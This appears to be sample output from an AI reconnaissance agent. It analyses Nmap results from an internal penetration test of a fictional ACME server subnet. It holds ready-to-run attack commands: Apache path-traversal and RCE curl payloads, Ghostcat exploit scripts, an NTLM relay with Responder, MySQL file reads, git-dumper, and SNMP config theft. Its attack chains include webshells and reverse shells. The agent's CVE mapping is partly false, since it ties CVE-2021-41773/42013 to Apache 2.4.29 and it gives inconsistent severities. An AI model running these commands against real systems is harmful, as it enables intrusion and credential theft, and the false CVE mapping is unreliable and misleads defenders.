Nmap Scan Analysis Report

March 29, 2026 ยท View on GitHub

Sample Output: Generated by the recon-advisor agent. This demonstrates automated analysis of Nmap scan results with prioritized findings, CVE mappings, and actionable follow-up recommendations.

Nmap Scan Analysis Report

Raw Scan Output

The following Nmap scan was executed against the 10.10.1.0/24 subnet (Server VLAN) during an internal penetration test.

Scan Command:

nmap -sS -sV -O -A --script=default,vuln -T4 -p- 10.10.1.50-53 -oA server_vlan_scan

Raw Results

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 09:23 EDT
Nmap scan report for web01.corp.acme.local (10.10.1.50)
Host is up (0.0012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: ACME Internal Portal
| http-methods:
|_  Potentially risky methods: PUT DELETE
| http-enum:
|   /admin/: Admin portal
|   /phpmyadmin/: phpMyAdmin
|   /.git/HEAD: Git repository found
|   /server-status: Apache server-status (accessible)
443/tcp  open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| ssl-cert: Subject: commonName=web01.corp.acme.local
| Not valid after:  2024-03-15T00:00:00
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
8080/tcp open  http     Apache Tomcat 9.0.30
|_http-title: Apache Tomcat/9.0.30
|_http-favicon: Apache Tomcat
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 00:50:56:B9:1A:2F (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

Nmap scan report for dc-file01.corp.acme.local (10.10.1.51)
Host is up (0.00085s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-15 13:23:45Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2019 Standard 17763 microsoft-ds
|_smb-os-discovery: Windows Server 2019 Standard 17763
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: CORP
|   NetBIOS_Domain_Name: CORP
|   NetBIOS_Computer_Name: DC-FILE01
|   DNS_Domain_Name: corp.acme.local
|   DNS_Computer_Name: dc-file01.corp.acme.local
|   Product_Version: 10.0.17763
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
MAC Address: 00:50:56:B9:3C:7E (VMware)
Device type: general purpose
Running: Microsoft Windows 2019
OS CPE: cpe:/o:microsoft:windows_server_2019
OS details: Microsoft Windows Server 2019 Build 17763
Network Distance: 1 hop

Host script results:
| smb2-time:
|   date: 2024-09-15T13:23:52
|_  start_date: N/A
|_clock-skew: mean: 0s, deviation: 0s, median: 0s

Nmap scan report for db01.corp.acme.local (10.10.1.52)
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a5:b7:4c:92:d1:f4:6e:8c:5a:1f:3b:7d:9e:2a:c4:8f (RSA)
|   256 d8:3e:7a:1b:c5:9f:2d:4a:6b:8c:e1:f7:3a:5d:9e:2b (ECDSA)
|_  256 f1:2a:8b:c4:d7:9e:3f:5a:6b:1c:e8:7d:4f:9a:2e:3b (ED25519)
| ssh-auth-methods:
|   Supported authentication methods:
|     publickey
|_    password
3306/tcp open  mysql   MySQL 5.7.29-0ubuntu0.18.04.1
| mysql-info:
|   Protocol: 10
|   Version: 5.7.29-0ubuntu0.18.04.1
|   Thread ID: 847
|   Capabilities flags: 65535
|   Some Coverage flags: 15
|   Status: Autocommit
|   Salt: 5]K\x0Eg7@m#}i%\x17s!Q&N\x03a
|_  Auth Plugin Name: mysql_native_password
| mysql-enum:
|   Valid usernames:
|     root:<empty> - Valid credentials
|_  Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0
| mysql-databases:
|   information_schema
|   acme_production
|   acme_hr
|   wordpress
|_  mysql
MAC Address: 00:50:56:B9:5D:A1 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

Nmap scan report for mgmt-sw01.corp.acme.local (10.10.1.53)
Host is up (0.0009s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      Cisco SSH 2.0 (protocol 2.0)
| ssh-hostkey:
|   2048 c3:8a:f2:1d:b5:e7:9c:4a:6f:d8:2b:7e:a1:3c:5d:9f (RSA)
161/tcp  open  snmp     SNMPv2c
| snmp-info:
|   enterprise: ciscoSystems
|   engineIDFormat: mac
|   engineIDData: 00:50:56:b9:7f:c2
|   snmpEngineBoots: 47
|_  snmpEngineTime: 182d 07:42:19
| snmp-brute:
|   public - Valid credentials
|_  private - Valid credentials
| snmp-sysdescr: Cisco IOS Software, Catalyst 3850 Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.3.5b, RELEASE SOFTWARE
|_  System uptime: 182 days, 7:42:19.00
443/tcp  open  ssl/http Cisco IOS HTTPS management
|_http-title: Cisco Switch Management
| ssl-cert: Subject: commonName=mgmt-sw01.corp.acme.local
|_  Not valid after:  2023-06-01T00:00:00
8443/tcp open  ssl/http Cisco Prime Infrastructure
|_http-title: Cisco Prime Infrastructure
| http-auth:
|   HTTP/1.1 401 Unauthorized
|_  Basic realm="Cisco Prime Infrastructure"
MAC Address: 00:50:56:B9:7F:C2 (VMware)
Device type: network device
Running: Cisco IOS 16.X
OS CPE: cpe:/o:cisco:ios:16
OS details: Cisco IOS 16.3.5b
Network Distance: 1 hop

Nmap done: 4 IP addresses (4 hosts up) scanned in 287.34 seconds

Agent Analysis

Prioritized Finding Summary

PriorityHostFindingSeverityCVEsImmediate Action
P110.10.1.52MySQL root with empty passwordCRITICALN/A (misconfiguration)Restrict access, set password immediately
P210.10.1.50Apache 2.4.29: path traversal / RCECRITICALCVE-2021-41773, CVE-2021-42013Patch to 2.4.58+, verify mod_cgi status
P310.10.1.50Apache Tomcat 9.0.30: Ghostcat AJPHIGHCVE-2020-1938Check for AJP connector on 8009, upgrade Tomcat
P410.10.1.51SMB signing disabledHIGHN/A (misconfiguration)Enable and require SMB signing via GPO
P510.10.1.50Exposed .git directoryHIGHN/A (misconfiguration)Block access, rotate any leaked credentials
P610.10.1.53SNMP default community strings (public/private)HIGHN/A (misconfiguration)Change community strings, restrict SNMP ACLs
P710.10.1.50Expired SSL certificateMEDIUMN/ARenew certificate
P810.10.1.53Expired management SSL certificateMEDIUMN/ARenew certificate
P910.10.1.50phpMyAdmin exposedMEDIUMN/A (misconfiguration)Restrict access to management IPs only
P1010.10.1.50Apache server-status accessibleLOWN/A (misconfiguration)Restrict to localhost

Detailed Host Analysis

Host 1: 10.10.1.50 (web01.corp.acme.local), Web Server

OS: Linux 4.15-5.8 (Ubuntu) Role: Internal web portal and application server Risk Level: CRITICAL

Finding 1.1: Apache HTTP Server 2.4.29, Multiple Critical CVEs

Apache 2.4.29 is significantly outdated (released October 2017) and is affected by numerous known vulnerabilities:

CVESeverityDescriptionCVSS
CVE-2021-41773CriticalPath traversal and remote code execution via crafted URI9.8
CVE-2021-42013CriticalBypass for CVE-2021-41773 fix, RCE via path traversal9.8
CVE-2021-44790CriticalBuffer overflow in mod_lua multipart parser9.8
CVE-2022-22720HighHTTP request smuggling9.8
CVE-2022-31813Highmod_proxy X-Forwarded-For header bypass9.8
CVE-2019-0211HighLocal privilege escalation via scoreboard manipulation7.8

Exploitation Path: CVE-2021-41773 allows reading arbitrary files and (if mod_cgi is enabled) executing system commands without authentication. This is a well-known, trivially exploitable vulnerability with public proof-of-concept code.

Finding 1.2: Apache Tomcat 9.0.30, Ghostcat (CVE-2020-1938)

Tomcat 9.0.30 is vulnerable to CVE-2020-1938 (Ghostcat), a critical vulnerability in the Apache JServ Protocol (AJP) connector. If the AJP connector is listening on port 8009 (default), an attacker can:

  • Read arbitrary files from the Tomcat webapp directories (including WEB-INF/web.xml containing credentials)
  • Achieve remote code execution if file upload is possible
CVESeverityCVSSExploit Available
CVE-2020-1938Critical9.8Yes, multiple public exploits
CVE-2020-9484High7.0Yes, deserialization via session persistence
CVE-2020-11996High7.5Yes, HTTP/2 DoS

Finding 1.3: Exposed .git Directory

The /.git/HEAD path is accessible, indicating the entire Git repository may be downloadable. This commonly exposes:

  • Source code of the application
  • Hardcoded credentials and API keys in commit history
  • Internal infrastructure details
  • Database connection strings

Finding 1.4: phpMyAdmin Exposed

phpMyAdmin is accessible at /phpmyadmin/. Combined with the MySQL root empty-password finding on 10.10.1.52, this could provide direct database administration access if the web server can reach the database server.

Finding 1.5: Risky HTTP Methods Enabled

PUT and DELETE methods are enabled on both ports 80 and 8080. PUT can potentially allow file upload leading to webshell deployment.


Host 2: 10.10.1.51 (dc-file01.corp.acme.local), Windows File Server

OS: Windows Server 2019 Build 17763 Role: File server with Kerberos services (possible secondary DC or domain-joined server with SPN registrations) Risk Level: HIGH

Finding 2.1: SMB Signing Disabled

SMB message signing is disabled on this host. This is a critical misconfiguration that enables:

  • NTLM relay attacks: An attacker who intercepts NTLM authentication (via LLMNR/NBT-NS poisoning, mitm6, or PetitPotam) can relay the authentication to this server to execute commands, access shares, or create machine accounts.
  • Man-in-the-middle attacks: Traffic between clients and this file server can be tampered with.

This is one of the most commonly exploited misconfigurations in Active Directory environments and frequently leads to domain compromise in real-world engagements.

Finding 2.2: Guest Account SMB Access

The scan indicates SMB authentication via the guest account is possible. This may allow unauthenticated share enumeration and potentially file access.

Finding 2.3: WinRM Enabled (5985/5986)

WinRM is listening on both HTTP (5985) and HTTPS (5986). If credentials or hashes are obtained, this provides a convenient lateral movement vector using tools like Evil-WinRM.

Finding 2.4: RDP Exposed (3389)

RDP is open, which expands the attack surface. Verify NLA is enforced and check for BlueKeep (CVE-2019-0708) if any older OS builds are present.


Host 3: 10.10.1.52 (db01.corp.acme.local), Database Server

OS: Linux 4.15-5.8 (Ubuntu 18.04) Role: MySQL database server Risk Level: CRITICAL

Finding 3.1: MySQL Root with Empty Password

This is the highest-priority finding in this scan. The MySQL root account has no password and is accessible from the network. This provides:

  • Complete database access: Full read/write to all databases including acme_production, acme_hr, and wordpress
  • Potential file system access: MySQL LOAD_FILE() and INTO OUTFILE functions can read and write files on the server
  • Potential command execution: If the MySQL server is running with elevated privileges, UDF (User Defined Functions) can be loaded for OS command execution
  • Credential harvesting: The wordpress database likely contains password hashes; acme_hr likely contains PII

Finding 3.2: MySQL 5.7.29, Known Vulnerabilities

MySQL 5.7.29 has reached end of support and contains known vulnerabilities:

CVESeverityDescription
CVE-2020-14812MediumServer: Locking unspecified vulnerability
CVE-2020-14769MediumServer: Optimizer unspecified vulnerability
CVE-2020-14765MediumServer: FTS unspecified vulnerability
CVE-2021-2307MediumServer: Packaging privilege escalation

While these CVEs are lower severity, the empty root password makes them largely academic since full access is already available.

Finding 3.3: OpenSSH 7.6p1, Outdated

OpenSSH 7.6p1 is outdated. While no critical RCE vulnerabilities exist for this specific version, it lacks security improvements in newer releases and may be vulnerable to username enumeration (CVE-2018-15473).


Host 4: 10.10.1.53 (mgmt-sw01.corp.acme.local), Network Switch

OS: Cisco IOS 16.3.5b (Catalyst 3850) Role: Network management switch Risk Level: HIGH

Finding 4.1: SNMP Default Community Strings

Both public (read-only) and private (read-write) community strings are active. With private community string access, an attacker can:

  • Modify switch configuration: Change VLAN assignments, ACLs, routing
  • Extract full running configuration: Including all credentials, SNMP strings, enable secrets
  • Disable security controls: Remove ACLs, disable port security, modify spanning tree
  • Create persistence: Add rogue SNMP users, modify TACACS/RADIUS configuration

The public community string alone enables extraction of:

  • Complete interface inventory and status
  • ARP tables (IP-to-MAC mappings for entire VLAN)
  • Routing tables
  • CDP/LLDP neighbor information (network topology mapping)

Finding 4.2: Cisco IOS 16.3.5b, Outdated

IOS 16.3.5b is several major versions behind current releases. Notable vulnerabilities include:

CVESeverityDescription
CVE-2020-3516MediumWeb UI DoS
CVE-2021-1385MediumCisco IOx path traversal
CVE-2023-20198CriticalIOS XE web UI privilege escalation (check if XE)

Finding 4.3: Expired SSL Certificate on Management Interface

The SSL certificate for the management HTTPS interface expired on 2023-06-01. This indicates the device may not be regularly maintained and suggests weak lifecycle management.

Finding 4.4: Cisco Prime Infrastructure (Port 8443)

Cisco Prime Infrastructure is running on port 8443 with basic HTTP authentication. Older versions of Cisco Prime have critical vulnerabilities including CVE-2019-15958 (RCE) and CVE-2018-15379 (arbitrary file upload). Version identification should be performed.


Follow-Up Commands

Immediate Priority (P1: MySQL Root Access)

# Verify MySQL root access and enumerate databases
mysql -h 10.10.1.52 -u root -e "SHOW DATABASES; SELECT user,host,authentication_string FROM mysql.user;"

# Check for file read/write privileges
mysql -h 10.10.1.52 -u root -e "SELECT @@secure_file_priv; SELECT LOAD_FILE('/etc/passwd');"

# Enumerate sensitive data
mysql -h 10.10.1.52 -u root -e "SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS FROM information_schema.TABLES WHERE TABLE_SCHEMA NOT IN ('information_schema','mysql','performance_schema','sys');"

# Check for UDF command execution potential
mysql -h 10.10.1.52 -u root -e "SELECT @@plugin_dir; SHOW VARIABLES LIKE 'have_symlink';"

P2: Apache Path Traversal (CVE-2021-41773)

# Test for path traversal (read /etc/passwd)
curl -s --path-as-is "http://10.10.1.50/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

# Test for RCE via mod_cgi (if enabled)
curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://10.10.1.50/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"

# Check mod_cgi/mod_cgid status
curl -s "http://10.10.1.50/server-status" | grep -i "cgi"

P3: Ghostcat (CVE-2020-1938)

# Check if AJP connector is listening on 8009
nmap -sS -p 8009 10.10.1.50

# If port 8009 is open, exploit Ghostcat to read WEB-INF/web.xml
python3 ajpShooter.py http://10.10.1.50 8009 /WEB-INF/web.xml read

# Alternative: use the PYFUSCATION tool
python3 ghostcat.py 10.10.1.50 -p 8009 -f /WEB-INF/web.xml

P4: SMB Signing Disabled (Relay Attack)

# Confirm SMB signing status across subnet
crackmapexec smb 10.10.1.0/24 --gen-relay-list relay_targets.txt

# Set up NTLM relay targeting 10.10.1.51
ntlmrelayx.py -tf relay_targets.txt -smb2support -socks

# In a separate terminal, start Responder to capture/relay hashes
responder -I eth0 -dwPv

P5: Exposed Git Repository

# Download the full .git directory
git-dumper http://10.10.1.50/.git/ ./git_dump

# Search for credentials in commit history
cd git_dump && git log --all -p | grep -iE "(password|secret|api_key|token|credential)" | head -50

# List all files ever committed
git log --all --diff-filter=A --summary | grep "create mode"

P6: SNMP Default Community Strings

# Full SNMP walk with public community string
snmpwalk -v2c -c public 10.10.1.53 1.3.6.1 > snmp_full_walk.txt

# Extract running configuration via private community string
snmpget -v2c -c private 10.10.1.53 1.3.6.1.4.1.9.9.96.1.1.1.1.0

# Use Metasploit to extract config
msfconsole -q -x "use auxiliary/scanner/snmp/cisco_config_tftp; set RHOSTS 10.10.1.53; set COMMUNITY private; run"

# Enumerate ARP table (map the network)
snmpwalk -v2c -c public 10.10.1.53 1.3.6.1.2.1.4.22.1.2

# Enumerate CDP neighbors (topology mapping)
snmpwalk -v2c -c public 10.10.1.53 1.3.6.1.4.1.9.9.23.1.2.1

P9: phpMyAdmin + MySQL Access Chain

# Check phpMyAdmin version
curl -s http://10.10.1.50/phpmyadmin/ | grep -oP 'phpMyAdmin \K[0-9.]+'

# If phpMyAdmin connects to 10.10.1.52, verify root access through the web interface
curl -s -c cookies.txt -b cookies.txt "http://10.10.1.50/phpmyadmin/index.php" \
  -d "pma_username=root&pma_password=&server=1"

Attack Path Recommendations

Path 1: MySQL to Full Server Compromise (Highest Probability)

MySQL root (no password) on 10.10.1.52
  --> Read /etc/shadow via LOAD_FILE()
  --> OR write webshell via INTO OUTFILE (if web root writable)
  --> OR load UDF for OS command execution
  --> Establish reverse shell as mysql user
  --> Local privilege escalation (Linux 4.15 kernel exploits / sudo misconfig)
  --> Pivot to other hosts

Path 2: Web Server Chain to Internal Network

Apache 2.4.29 path traversal (CVE-2021-41773) on 10.10.1.50
  --> Read sensitive files (/etc/passwd, application configs, database credentials)
  --> If mod_cgi enabled: direct RCE
  --> OR: Ghostcat (CVE-2020-1938) on Tomcat for web.xml credentials
  --> OR: .git dump for source code and embedded credentials
  --> Access phpMyAdmin with harvested credentials
  --> Pivot to database server

Path 3: NTLM Relay to Windows Admin Access

LLMNR/NBT-NS poisoning (broadcast traffic capture)
  --> Relay NTLM authentication to 10.10.1.51 (SMB signing disabled)
  --> Execute commands via SMB on file server
  --> Dump SAM database / cached credentials
  --> Access file shares for sensitive documents
  --> Lateral movement to other Windows hosts

Path 4: Network Infrastructure Compromise

SNMP private community string on 10.10.1.53
  --> Download full switch running configuration
  --> Extract enable secret, TACACS credentials
  --> Modify VLAN ACLs to access restricted segments
  --> Modify spanning tree / routing for traffic interception
  --> Pivot to Management VLAN devices

The recommended attack chain combines the highest-impact findings for maximum demonstrated risk:

1. MySQL root empty password (10.10.1.52) -- immediate database access
2. Extract credentials from acme_production and wordpress databases
3. Test credential reuse against domain accounts
4. Use Apache path traversal (10.10.1.50) -- file read for additional credentials
5. Dump .git repository for application secrets
6. NTLM relay via SMB signing disabled (10.10.1.51) -- Windows lateral movement
7. SNMP config extraction (10.10.1.53) -- network infrastructure access
8. Combine all access for full attack narrative in report

MITRE ATT&CK Mapping

Technique IDTechnique NameApplicable Finding
T1190Exploit Public-Facing ApplicationApache CVE-2021-41773, Tomcat CVE-2020-1938
T1046Network Service ScanningInitial Nmap scan, service enumeration
T1110.001Brute Force: Password GuessingMySQL empty root password
T1078.001Valid Accounts: Default AccountsMySQL root, SNMP public/private
T1557.001LLMNR/NBT-NS Poisoning and SMB RelaySMB signing disabled on 10.10.1.51
T1213Data from Information RepositoriesDatabase access, file share access
T1552.001Unsecured Credentials: Credentials in Files.git repository, server-status, phpMyAdmin
T1602.001Data from Configuration Repository: SNMPSNMP default community strings
T1021.004Remote Services: SSHSSH access to 10.10.1.52, 10.10.1.53
T1021.001Remote Services: RDPRDP open on 10.10.1.51
T1021.006Remote Services: WinRMWinRM open on 10.10.1.51
T1059Command and Scripting InterpreterPost-exploitation command execution
T1005Data from Local SystemFile system access via path traversal

Analysis generated from Nmap scan data. All findings require manual verification before exploitation. Follow rules of engagement and obtain explicit authorization before executing any exploitation commands.